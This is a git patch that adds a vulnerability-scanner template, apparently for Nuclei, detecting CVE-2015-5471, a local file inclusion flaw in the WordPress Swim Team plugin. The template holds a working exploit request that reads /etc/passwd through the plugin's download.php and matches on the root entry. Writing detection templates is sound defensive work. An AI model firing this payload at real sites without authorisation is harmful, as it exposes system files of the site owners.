From 5ad972dc6bf9b8e3fd776e13772b2893cc7b0750 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 26 Oct 2021 08:04:56 +0900
Subject: [PATCH] Create CVE-2015-5471.yaml

---
 CVE-2015-5471.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 CVE-2015-5471.yaml

diff --git a/CVE-2015-5471.yaml b/CVE-2015-5471.yaml
new file mode 100644
index 0000000000..4c6adff168
--- /dev/null
+++ b/CVE-2015-5471.yaml
@@ -0,0 +1,23 @@
+id: CVE-2015-5471
+info:
+  name: Swim Team <= v1.44.10777 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
+  tags: wordpress,plugin,wp,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200